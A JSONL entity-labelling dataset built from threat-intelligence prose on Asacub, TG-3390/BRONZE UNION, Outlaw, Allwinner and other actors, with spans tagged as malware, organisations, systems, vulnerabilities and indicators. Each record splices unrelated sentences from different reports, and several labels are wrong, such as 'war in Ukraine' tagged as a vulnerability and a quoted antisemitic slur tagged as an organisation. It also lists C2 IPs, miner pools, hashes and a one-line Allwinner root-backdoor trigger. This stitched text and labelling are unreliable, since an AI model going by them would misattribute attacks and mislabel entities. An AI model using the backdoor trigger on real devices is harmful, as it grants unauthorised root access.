{"text": "It includes information about the smartphone model , the OS version , the mobile operator , and the Trojan version . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . The Shellbot script is added to run after the victim \u2019s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab . CozyDuke droppers and spyware components often maintain fairly common characteristics , but the files \u2019 functionality is slightly modified depending on the actor \u2019s needs .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 236, "end": 256, "label": "System"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 298, "end": 303, "label": "System"}, {"start": 423, "end": 431, "label": "Malware"}, {"start": 568, "end": 576, "label": "Malware"}]}
{"text": "Let \u2019 s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS . However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits \u2019 latest version . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 110, "end": 113, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 149, "end": 185, "label": "System"}]}
{"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( \u201c command \u201d ) , its parameters ( \u201c params \u201d ) , and the time delay before execution ( \u201c waitrun \u201d in milliseconds ) . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . It remains unclear whether these are leftover code from the previous versions or their particular purposes were served . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": [{"start": 355, "end": 368, "label": "Vulnerability"}, {"start": 436, "end": 456, "label": "System"}, {"start": 463, "end": 476, "label": "Vulnerability"}, {"start": 498, "end": 503, "label": "System"}, {"start": 774, "end": 785, "label": "Organization"}, {"start": 905, "end": 932, "label": "Organization"}]}
{"text": "List of commands sewn into the body of the Trojan : Command code Parameters Actions 2 \u2013 Sending a list of contacts from the address book of the infected device to the C & C server 7 \u201c to \u201d : int Calling the specified number 11 \u201c to \u201d : int , \u201c body \u201d : string Sending an SMS with the specified text to the specified number 19 \u201c text \u201d : string , \u201c n \u201d : string Sending SMS with the specified text to numbers from the address book of the infected device , with the name of the addressee from the TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL . Shellbot is also used to control the botnet , with a command that is sent and run from the C&C to determine if there is a code execution in the shell , the hostname , and its architecture . None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": [{"start": 124, "end": 136, "label": "System"}, {"start": 417, "end": 429, "label": "System"}, {"start": 495, "end": 502, "label": "Organization"}, {"start": 642, "end": 650, "label": "Malware"}, {"start": 679, "end": 685, "label": "Malware"}, {"start": 733, "end": 736, "label": "System"}]}
{"text": "address book substituted into the message text 40 \u201c text \u201d : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 249, "end": 255, "label": "Malware"}, {"start": 258, "end": 261, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 505, "end": 511, "label": "Organization"}, {"start": 535, "end": 538, "label": "System"}, {"start": 553, "end": 569, "label": "Vulnerability"}, {"start": 593, "end": 596, "label": "Organization"}, {"start": 603, "end": 617, "label": "Vulnerability"}]}
{"text": "In the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( \u201c get_sms \u201d , \u201c block_phone \u201d ) . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system . We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs . The US Justice Department thinks he 's been deploying LockBit ransomware on victim networks both in the States and overseas , with the investigation having run from August 2020 through March 2023 .", "spans": [{"start": 226, "end": 231, "label": "System"}, {"start": 236, "end": 247, "label": "System"}, {"start": 297, "end": 318, "label": "System"}, {"start": 321, "end": 325, "label": "System"}, {"start": 332, "end": 352, "label": "System"}, {"start": 355, "end": 358, "label": "System"}, {"start": 424, "end": 441, "label": "System"}, {"start": 448, "end": 469, "label": "Organization"}, {"start": 498, "end": 516, "label": "Malware"}]}
{"text": "In later versions , instead of the name of the command , its numerical code was transmitted . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence \u2019s website .", "spans": [{"start": 94, "end": 97, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 370, "end": 375, "label": "System"}]}
{"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied . TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter . These routines are indicative of the group \u2019s aim to get quantitative returns through varied cybercriminal profit streams . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 152, "end": 169, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 394, "end": 399, "label": "Malware"}, {"start": 582, "end": 591, "label": "Malware"}]}
{"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system . This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code . But a layered , comprehensive cyber security strategy can do even more to keep your organization safe and secure .", "spans": [{"start": 168, "end": 178, "label": "System"}]}
{"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Furthermore , based on the group \u2019s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they \u2019re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities . Last month , NoEscape posted 7 victims on their leak site .", "spans": [{"start": 137, "end": 140, "label": "Organization"}, {"start": 192, "end": 199, "label": "Organization"}, {"start": 668, "end": 676, "label": "Malware"}]}
{"text": "The \u201c id \u201d value inside the \u201c data \u201d block is equal to the \u201c timestamp \u201d value of the relevant command : In addition , the Trojan sets itself as the default SMS application and , on receiving a new SMS , forwards the sender \u2019 s number and the message text in base64 format to the cybercriminal : Thus , Asacub can withdraw funds from a bank card linked to the phone by sending SMS for the transfer of funds to another account using the number of the card or mobile phone . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access . Considering the amount of resources needed to deploy all the necessary patches for an enterprise ( such as quality testing and operations alignment ) , which implies costly downtime for operations and the hesitation to update all systems immediately , Outlaw may find even more targets and victims for their updated botnets every time there is a patch released and waiting to be downloaded . While no substantive posts have been made to the FuckNATO channel since late April 2023 , Mandiant anticipates that KillNet and its affiliates will continue to target NATO for the continued future , with the potential for developments in the war in Ukraine to reinvigorate targeting .", "spans": [{"start": 303, "end": 309, "label": "Malware"}, {"start": 856, "end": 862, "label": "Organization"}, {"start": 1112, "end": 1119, "label": "Organization"}, {"start": 1156, "end": 1167, "label": "Organization"}, {"start": 1234, "end": 1252, "label": "Vulnerability"}]}
{"text": "Moreover , the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card . They then identify the Exchange server and attempt to install the OwaAuth web shell . Save for a few iteration updates , combinations from previous deployments , and using the routines repetitively for every campaign , we found very little changes in the group \u2019s toolkit , which allowed various honeypots across the Eastern European region to detect many of the sent binaries . The NCSC also assesses that it is almost certain Russia was responsible for the subsequent cyber - attack impacting Viasat on 24 February .", "spans": [{"start": 209, "end": 226, "label": "System"}, {"start": 439, "end": 448, "label": "Malware"}, {"start": 526, "end": 530, "label": "Organization"}, {"start": 571, "end": 577, "label": "Organization"}, {"start": 602, "end": 627, "label": "Organization"}, {"start": 638, "end": 644, "label": "Organization"}]}
{"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells . Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed . This could indicate a lack of coordination across different individuals or operational subteams involved in the attack .", "spans": [{"start": 133, "end": 150, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 573, "end": 671, "label": "Indicator"}]}
{"text": "What \u2019 s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the Trojan prevents the banking app from running on the phone . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name . We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 305, "end": 324, "label": "System"}, {"start": 571, "end": 591, "label": "Organization"}, {"start": 703, "end": 721, "label": "System"}, {"start": 722, "end": 751, "label": "Vulnerability"}, {"start": 752, "end": 768, "label": "Vulnerability"}, {"start": 773, "end": 789, "label": "Vulnerability"}]}
{"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access . By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers . Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 161, "end": 164, "label": "Organization"}, {"start": 438, "end": 451, "label": "Organization"}, {"start": 473, "end": 487, "label": "Organization"}]}
{"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode . TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX . Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them . The high similarity of the fake job recruitment campaigns both groups used to disguise their attacks , and the fact that Lazarus relied on similar versions of Rising Sun in activity tracked in 2017 , point to a connection between the two adversaries .", "spans": [{"start": 403, "end": 410, "label": "Organization"}, {"start": 454, "end": 473, "label": "System"}, {"start": 576, "end": 587, "label": "System"}, {"start": 591, "end": 596, "label": "System"}, {"start": 753, "end": 787, "label": "Organization"}, {"start": 851, "end": 858, "label": "System"}]}
{"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously . That Budworm continues to use a known malware SysUpdate , alongside techniques it is known to favor , such as DLL sideloading using an application it has used for this purpose before , indicate that the group is nt too concerned about having this activity associated with it if it is discovered .", "spans": [{"start": 20, "end": 26, "label": "Malware"}, {"start": 508, "end": 515, "label": "Organization"}, {"start": 541, "end": 558, "label": "Malware"}, {"start": 706, "end": 711, "label": "Organization"}]}
{"text": "Example of using native code for obfuscation Examples of using string concatenation for obfuscation Example of encrypting strings in the Trojan Asacub distribution geography Asacub is primarily aimed at Russian users : 98 % of infections ( 225,000 ) occur in Russia , since the cybercriminals specifically target clients of a major Russian bank . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication . We will continue to monitor this hacking group \u2019s activities and their toolkit \u2019s developments . Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": [{"start": 144, "end": 150, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 580, "end": 593, "label": "Organization"}, {"start": 621, "end": 636, "label": "System"}, {"start": 671, "end": 678, "label": "Malware"}, {"start": 688, "end": 723, "label": "System"}]}
{"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries . In 2015 , the SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU\u2122 analysis suggests is based in the People's Republic of China ( PRC ) . Outlaw \u2019s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": [{"start": 147, "end": 180, "label": "Organization"}, {"start": 183, "end": 186, "label": "Organization"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 533, "end": 538, "label": "Organization"}, {"start": 567, "end": 573, "label": "Organization"}, {"start": 609, "end": 613, "label": "Organization"}, {"start": 625, "end": 636, "label": "Organization"}]}
{"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used . Legacy system users may use their providers \u2019 virtual patches . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 23, "end": 29, "label": "Malware"}, {"start": 206, "end": 214, "label": "System"}, {"start": 219, "end": 222, "label": "System"}, {"start": 268, "end": 275, "label": "Organization"}, {"start": 429, "end": 437, "label": "Organization"}]}
{"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) . Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators \u2019 support . These frameworks are commonly delivered as part of traditional commodity malware , so infection chains can vary widely .", "spans": [{"start": 185, "end": 196, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 275, "end": 278, "label": "Organization"}]}
{"text": "At the same time , cybercriminals are reluctant to change the method of communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing . Later in the month , Microsoft officially confirmed that numerous outages of its products were a direct result of DDoS attacks conducted by Anonymous Sudan .", "spans": [{"start": 649, "end": 661, "label": "Organization"}, {"start": 675, "end": 690, "label": "Organization"}]}
{"text": "The most significant change in this particular Trojan \u2019 s history was the encryption of data sent between the device and C & C . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks . Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw \u2019s through a cross-generational blend of threat defense techniques . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 175, "end": 178, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 258, "end": 278, "label": "Organization"}, {"start": 402, "end": 408, "label": "Organization"}]}
{"text": "That said , so as to hinder detection of new versions , the Trojan \u2019 s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use . this SWC was used to specifically target Turkish . Trend Micro\u2122 XGen\u2122 security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": [{"start": 193, "end": 196, "label": "System"}, {"start": 239, "end": 257, "label": "System"}]}
{"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 26, "end": 40, "label": "Indicator"}, {"start": 41, "end": 55, "label": "Indicator"}, {"start": 56, "end": 70, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Indicator"}, {"start": 86, "end": 100, "label": "Indicator"}, {"start": 101, "end": 115, "label": "Indicator"}, {"start": 116, "end": 129, "label": "Indicator"}, {"start": 130, "end": 143, "label": "Indicator"}, {"start": 144, "end": 154, "label": "Indicator"}, {"start": 155, "end": 179, "label": "Indicator"}, {"start": 219, "end": 233, "label": "Indicator"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 264, "label": "Indicator"}, {"start": 265, "end": 279, "label": "Indicator"}, {"start": 280, "end": 293, "label": "Indicator"}, {"start": 294, "end": 307, "label": "Indicator"}, {"start": 375, "end": 378, "label": "System"}, {"start": 402, "end": 437, "label": "Organization"}, {"start": 452, "end": 461, "label": "Organization"}, {"start": 464, "end": 472, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 483, "end": 493, "label": "Organization"}, {"start": 496, "end": 506, "label": "Organization"}, {"start": 513, "end": 536, "label": "Organization"}, {"start": 652, "end": 656, "label": "System"}, {"start": 795, "end": 800, "label": "Organization"}, {"start": 840, "end": 856, "label": "System"}]}
{"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of threats that could compromise intangible assets . It is foreseeable that an organization such as the Earth Liberation Front ELF may attempt an attack to make a political or social statement while the same organization could be targeted by an adversarial nation state in an attempt to steal intellectual property .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 14, "end": 27, "label": "Indicator"}, {"start": 37, "end": 101, "label": "Indicator"}, {"start": 102, "end": 166, "label": "Indicator"}, {"start": 167, "end": 231, "label": "Indicator"}, {"start": 232, "end": 296, "label": "Indicator"}, {"start": 345, "end": 363, "label": "Organization"}, {"start": 449, "end": 471, "label": "Organization"}, {"start": 474, "end": 490, "label": "Organization"}, {"start": 497, "end": 518, "label": "Organization"}, {"start": 629, "end": 672, "label": "System"}, {"start": 675, "end": 680, "label": "System"}, {"start": 826, "end": 856, "label": "Organization"}, {"start": 971, "end": 995, "label": "Organization"}]}
{"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c this SWC was used to specifically target Turkish goverment . XGen security also powers Trend Micro \u2019s suite of security solutions : Hybrid Cloud Security and User Protection . We initially tracked this activity as UNC3810 before merging the cluster with Sandworm .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 268, "label": "System"}, {"start": 321, "end": 325, "label": "Organization"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 474, "end": 481, "label": "Organization"}, {"start": 514, "end": 522, "label": "Organization"}]}
{"text": "31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Outlaw : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 255, "end": 258, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 431, "end": 437, "label": "Organization"}, {"start": 440, "end": 504, "label": "Indicator"}, {"start": 505, "end": 525, "label": "System"}, {"start": 526, "end": 548, "label": "Malware"}, {"start": 582, "end": 589, "label": "Organization"}]}
{"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? this SWC was used to specifically target Turkish banking . Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 47, "end": 54, "label": "System"}, {"start": 69, "end": 72, "label": "System"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 123, "end": 129, "label": "Organization"}, {"start": 132, "end": 196, "label": "Indicator"}, {"start": 197, "end": 205, "label": "Malware"}, {"start": 206, "end": 229, "label": "Malware"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 279, "end": 305, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}]}
{"text": "It is possibly one of the most frequently asked questions on the Internet . this SWC was used to specifically target Turkish academic networks . Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B . In one exchange on Aug. 16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 81, "end": 84, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 154, "end": 218, "label": "Indicator"}, {"start": 224, "end": 247, "label": "Malware"}, {"start": 286, "end": 318, "label": "Organization"}]}
{"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access . BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems . Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others \u201c greedy Jew bastards . \u201d", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 284, "end": 348, "label": "Indicator"}, {"start": 349, "end": 369, "label": "System"}, {"start": 370, "end": 400, "label": "Malware"}, {"start": 436, "end": 443, "label": "Organization"}, {"start": 500, "end": 508, "label": "Organization"}, {"start": 537, "end": 545, "label": "Organization"}, {"start": 559, "end": 578, "label": "Organization"}]}
{"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor . The threat actors appear to be able to create and leverage multiple SWCs in parallel . Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 . The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show \u2019s producers at the Warner Bros. production company Wall to Wall Media .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 32, "end": 35, "label": "System"}, {"start": 114, "end": 119, "label": "System"}, {"start": 257, "end": 261, "label": "System"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 285, "end": 349, "label": "Indicator"}, {"start": 350, "end": 370, "label": "System"}, {"start": 371, "end": 401, "label": "Malware"}, {"start": 465, "end": 480, "label": "Organization"}, {"start": 485, "end": 499, "label": "Organization"}, {"start": 564, "end": 614, "label": "Organization"}]}
{"text": "Chinese fabless semiconductor company Allwinner is a leading supplier of application processors that are used in many low-cost Android tablets , ARM-based PCs , set-top boxes , and other electronic devices worldwide . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Outlaw : 159.203.141.208 . The hosting services offered at secure[.]66[.]to are in fact hosting services rented to other companies worldwide .", "spans": [{"start": 38, "end": 47, "label": "Organization"}, {"start": 127, "end": 134, "label": "System"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 243, "end": 246, "label": "Organization"}, {"start": 283, "end": 288, "label": "Malware"}, {"start": 366, "end": 372, "label": "Organization"}, {"start": 375, "end": 390, "label": "Indicator"}, {"start": 425, "end": 441, "label": "Indicator"}]}
{"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is\u2026 Send the text \" rootmydevice '' to any undocumented debugging process . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance . Outlaw : 104.236.192.6 . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 102, "end": 109, "label": "System"}, {"start": 312, "end": 318, "label": "Organization"}, {"start": 321, "end": 334, "label": "Indicator"}, {"start": 337, "end": 368, "label": "Organization"}, {"start": 380, "end": 560, "label": "Indicator"}, {"start": 578, "end": 590, "label": "Organization"}]}
{"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure . Outlaw : 45.9.148.129:80 Miner pool . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 60, "end": 71, "label": "System"}, {"start": 72, "end": 79, "label": "System"}, {"start": 202, "end": 209, "label": "System"}, {"start": 457, "end": 463, "label": "Organization"}, {"start": 466, "end": 481, "label": "Indicator"}, {"start": 482, "end": 492, "label": "System"}, {"start": 495, "end": 508, "label": "Organization"}]}
{"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process . This script relays commands and output between the controller and the system . Outlaw : 45.9.148.125:80 Miner pool . The increasing usage of bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations .", "spans": [{"start": 127, "end": 153, "label": "Malware"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 203, "end": 218, "label": "Indicator"}, {"start": 219, "end": 229, "label": "System"}, {"start": 256, "end": 365, "label": "Organization"}]}
